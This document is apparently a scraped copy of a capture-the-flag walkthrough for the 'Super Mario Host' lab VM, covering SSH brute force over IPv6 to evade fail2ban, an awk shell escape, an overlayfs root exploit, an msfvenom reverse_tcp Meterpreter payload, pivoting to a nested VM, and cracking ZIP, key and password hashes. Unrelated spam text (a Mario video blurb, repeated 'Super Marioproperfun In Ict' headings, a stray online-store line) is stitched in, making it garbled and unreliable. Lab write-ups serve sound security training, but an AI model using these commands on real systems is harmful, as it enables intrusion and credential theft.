8/23/2021

Super Marioproperfun In Ict

I don't know how in the holy mother of fudge this got two million views, but I feel totally honoured! Thanks everyone:DThis is a 100% longplay - all level. Super Mario is just good, clean fun. Except when he's drinking blood to send demons back to hell, starring in his own 'adult' film, or carrying out mass murder.

  1. Super Marioproperfun In Ict Development

Super Mario Host is an SMB themed CTF created by mr_h4sh. The goal of the CTF is to discover the two hidden flags and to find the passwords of all the characters with accounts on the system.

Service Discovery

Super mario proper fun in ict course

Running Nmap revealed that the target machine has an SSH and HTTP server running on ports 22 and 8180. Based on the fingerprinting Nmap carried out, they seemed to be OpenSSH 6.6.1p1 and Apache:

Analysis of Web Server

Taking a look at the default page being served by the web server indicated the web server is actually nginx, as opposed to Apache, as the default nginx page is being served with the message:

Welcome to nginx!If you see this page, the nginx web server is successfully installed and working.Further configuration is required.

For online documentation and support please refer to nginx.org.Commercial support is available at nginx.org.

Thank you for using nginx.

Nikto seemed to agree with Nmap that the web server is indeed Apache, and also found one of the default Apache files as well, but failed to find anything else of interest:

Running dirb using the big.txt wordlist uncovered a single interesting entry, which was a file named vhosts:

The file contained an Apache virtual host configuration file, eluding to there being a vhost configured on the machine:

Virtual hosts work by checking the value submitted in the Host header of a HTTP request and then using that to choose which directory to serve. In this instance, if the server is addressed by accessing http://mario.supermariohost.local:8180/ as opposed to http://10.2.0.104:8180/, it would serve the mario.php file from the /var/www/supermariohost directory.

This is easily set when using cURL to access files, but in order to easily view the rendered pages, I added a new entry to my hosts file so I could access it from a browser easily by running echo '10.2.0.104 mario.supermariohost.local' >> /etc/hosts

Once the hosts file was updated, I navigated to the page and had a poke around the JavaScript to see if there was any interesting easter eggs, but didn’t find anything; just a small Mario game:

I also re-ran Nikto and dirb, but this time specifying the Mario vhost using nikto -host 10.2.0.104:8180 -vhost mario.supermariohost.local and dirb http://10.2.0.104:8180 /usr/share/wordlists/dirb/big.txt -H 'Host: mario.supermariohost.local'. Neither scan discovered any new files being served.

Re-winding back to the vhost file, as there was a mario.php file being served as the default page, I tried luigi.php and found a message from Mario’s taller, greener brother:

Hey!! It’sa Luiiiggiii!!My short brother doesn’t know that I’m wandering around his host and messing around, he’s new with computers!Since I’m here I want to tell you more about myself…my brother is a nice person but we are in love for the same person: Princess Peach! I hope she will find out about this.I Love PeachForever yours,Luigi

As I manually found two files named after Super Mario characters, I put together a word list using character names from the series to use with dirb, but none yielded any hits (other than the already identified mario.php and luigi.php).

SSH Enumeration & Analysis

With no more leads to follow on the web server, I began to enumerate the users on the SSH server using the ssh_enumusers Metasploit module.

The user list I used for this was the word list I had previously generated containing the Super Mario character names.

There was an interesting pattern with these results, which made me believe I was getting false-positives. That being, for every user that it believed it had found, the next user timed out, for example:

As there was a rather consistent pattern to the timeouts, this led me to believe there may be something such as fail2ban running, which will block IP addresses for a specific amount of time, should it detect enough suspicious activity in the log files of the services it is monitoring.

On the off-chance it was indeed fail2ban causing the timeouts, I decided to try enumeration using IPv6 instead, as fail2ban has no IPv6 support at all (as of June 2017).

To do this, I needed to identify the IPv6 address of the target machine, which I did using the ipv6_multicast_ping Metasploit module; though, this can also be done using the ping6 application.

As there were two hosts with IPv6 addresses responding to the multicast, I ran Nmap against them to narrow down which one is the target, and found that fe80::a00:27ff:febe:21fc had the same open ports:

N.B. %eth1 is appended in some places to the IPv6 address as to indicate which interface to use. For modules / applications that allow you to specify the interface, this can be omitted.

After identifying the IPv6 address of the target, I began to re-run the ssh_enumusers module against it. This time, every request was timing out, however the port was definitely open and the service was definitely listening, which indicated that the Metasploit module may not support IPv6.

As a result of the module failing, I went on the hunt for an SSH brute force script and came across getsshpass.sh by Radovan Brezula.

Ict

This script doesn’t support IPv6 out of the box, but I made a few quick modifications to it in order to use it against the IPv6 target.

The modified script can be downloaded from This Gist or can be found below:

For the sake of testing if IPv6 activity was being monitored, I ran the script, using the character word list I had created as both the username and password list. It iterated through every combination, without any timeouts, which indicated that IPv6 was open to a brute force attack.

Brute Forcing the SSH Server

Once I had confirmed there was no IPv6 monitoring and had a reliable script to perform the attack, I built a new word list using CeWL and John [the Ripper] based on the content of Luigi’s message in luigi.php. I then used the word list to brute force the SSH server using getsshpass.sh:

Escaping Limited Shell & Privilege Escalation

As can be seen in the previous screenshot, Luigi’s user was stuck in a limited shell, with access to awk, cat, cd, clear, echo, exit, help, history, ll, lpath, ls, lsudo and vim.

Before trying to break out of the shell, I checked out the contents of Luigi’s home directory and took a look at the message file:

My first attempt at breaking out of the shell was to try and use command execution from within vim, but the version of vim installed does not allow this, but as awk was available, I was able to break out by running awk 'BEGIN {system('/bin/bash')}'

Once out of the shell, I proceeded to look around to see if there was anything that may help me get root, but didn’t find anything interesting and instead compiled the overlayfs exploit and escalated using it:

Acquiring and Cracking First Flag

Now that I had root access, I used msfvenom to create a Meterpreter executable by running msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.2.0.3 -f elf > shell.elf and executed it on the target whilst running the multi_handler module in Metasploit.

Once I had a Meterpreter session, I began to poke around in /root and found a file named flag.zip. I tried to unzip this on the target, and found that the ZIP file is password protected; so I proceeded to download it and try to crack it using fcrackzip and the word list I had previously generated to crack the SSH passwords:

As none of the passwords in the word list were successful, I tried again using the rockyou.txt word list, and successfully found the password:

The first flag contained a message from mr_h4sh that also indicates that in addition to finding the flag, the user should also be attempting to get the passwords for all the users on the machine:

Well done :D If you reached this it means you got root, congratulations.Now, there are multiple ways to hack this machine. The goal is to get all the passwords of all the users in this machine. If you did it, then congratulations, I hope you had fun :D

Keep in touch on twitter through @mr_h4sh

Congratulations again!

Super Marioproperfun In Ict

mr_h4sh

Finding Mario’s Password

With the previous message from mr_h4sh in mind, I ran a couple of post modules in the Meterpreter session to gather the password hashes and see if any SSH credentials were stored on the system. No SSH credentials were found, but I had the hashes that I could try to crack using JTR:

Once I had the hashes, I created a new word list using Mario’s ZIP file password [ilovepeach] as the seed for the permutations and ran JTR to get the last two passwords from the system:

Service Discovery on the Warluigi VM

With the first flag down, I began more recon work to try and find the second flag. Part of this involved checking the running processes using ps aux, where I found that a VM named warluigi was running within the VM.

Running ifconfig on the Mario host revealed the network adapter [virbr0] that is being used with the Warluigi VM:

As Nmap wasn’t available on the Mario host, I grabbed a host discovery script and modified it to scan on the 192.168.122.0 subnet:

I then uploaded and executed it on the Mario host to identify what address had been assigned to the Warluigi host, which was 192.168.122.122:

Next, I used Metasploit’s pivoting functionality to route traffic to 192.168.122.0/24 via the Meterpreter session I had established to the Mario host and proceeded to run a port scan on the Warluigi VM:

The results of the port scan indicated that ports 22 and 80 were open with services listening on them, so I loaded up the ssh_version module to verify which SSH server was running and to try and fingerprint the OS; which is seemingly Ubuntu 14.04:

Warluigi Web Server Fingerprinting

As the web server running on the Warluigi machine wasn’t visible from outside the Mario host, I setup a port forward via the Meterpreter session to get access to it:

With the port forward setup, I proceeded to run Nikto and dirb against the web server. Nikto was unable to find anything of interest, but dirb did find a Nagios installation that is protected by basic authentication:

Metasploit contained no entry for Nagios in it’s default credentials list, but a quick search revealed the default credentials for certain versions of Nagios are nagiosadmin:nagios, which was the case on the Warluigi VM.

I looked around the Nagios management page, but couldn’t find any functionality that seemed exploitable at first glance, and none of the exploits I tried were successful.

More Enumeration and Private Key Cracking

As there didn’t seem to be any vulnerabilities in the web server, I went back to the Mario host session and began doing more enumeration. Meterpreter had previously failed to find any SSH keys, so I decided to search the entire file system, rather than just the default locations the post module checks:

The particularly interesting files found in this search were:

  • /.bak/users/luigi/id_rsa
  • /.bak/users/luigi/id_rsa.pub

I headed over to the /.bak/users/luigi directory and had a look at what else was in there and found another message file:

How to start an online store. As the key was presumably going to get me access to the Warluigi VM, I proceeded to setup another port forward, this time to port 22, and proceeded to try to connect using id_rsa:

After forgetting to apply the correct permissions, I ran chmod 400 warluigi_rsa/id_rsa and tried again, to find that the key had a passphrase.

In an attempt to build up a relevant word list, I used three words as the seeds for the permutations:

  • warluigi (the name of the VM)
  • war (one of the two words in Mario’s last message that were en-quoted)
  • naughty (one of the two words in Mario’s last message that were en-quoted)

Once I had the word list built, I proceeded to run the private key through ssh2john and then cracked it using JTR:

Getting Root on Warluigi VM

Much like the Mario host, getting root on the Warluigi VM is just a case of compiling and running the overlayfs exploit:

Once I had root, I setup the multi_handler module in Metasploit again, but this time with the bind_tcp payload, in order to get a Meterpreter session on Warluigi:

Finding & Cracking the Last Flag

After getting the Meterpreter session, I took a look in /root as per the previous host, and found a file named .hint.txt and another ZIP file that seemingly contained a flag:

The hint file contained another message about Princess Peach:

So, today I saw her again, Peach. I’m so in love for her but my brother is completely lost for her.I know that he loves Peach, but Peach Loves Me.

Also within the /root directory was a .mozilla directory, suggesting that the machine may have FireFox data on it, which led me to run the firefox_creds post module, but it returned nothing:

Next, I dumped the user hashes, as I’d have to crack these to finish the challenge anyway:

I continued to look for some plain-text credentials that may be hanging around the system by checking out the Nagios installation. The sample configuration file that I found in /opt/nagios-4.1.1/sample-config/nagios.cfg suggested that there was a resource file that could store passwords in it:

I checked out the default location of resource.cfg, and whilst the file was there, there were no passwords within it. Likewise, the only user within /usr/local/nagios/etc/htpasswd.users was the previously identified default user [nagiosadmin], so it was seeming this may just be an unconfigured installation without much to go on.

Having failed to find any plain text credentials, I proceeded to build up a new word list, using the previously found hint file as a basis for it. The phrase “Peach Loves Me” stood out in the hint file, as it was in proper case, so I created a few permutations of this manually along with “warluigi” and used them as the seed for the word list I created using JTR:

With the word list created, I attempted to crack the ZIP file with it, and got an almost instant result:

The content of the second and last flag reads:

Congratulations on your second flag!

As already mentioned in supermariohost, there are multiple ways to hack this machine. The goal is to get all the passwords of all the users in this machine. If you did it, then congratulations, I hope you had fun :D

Keep in touch on twitter through @mr_h4sh

Congratulations again!

mr_h4sh

Super Marioproperfun In Ict Development

And to finish up, I used the same word list to try and crack the user password hashes and revealed both the warluigi and root passwords: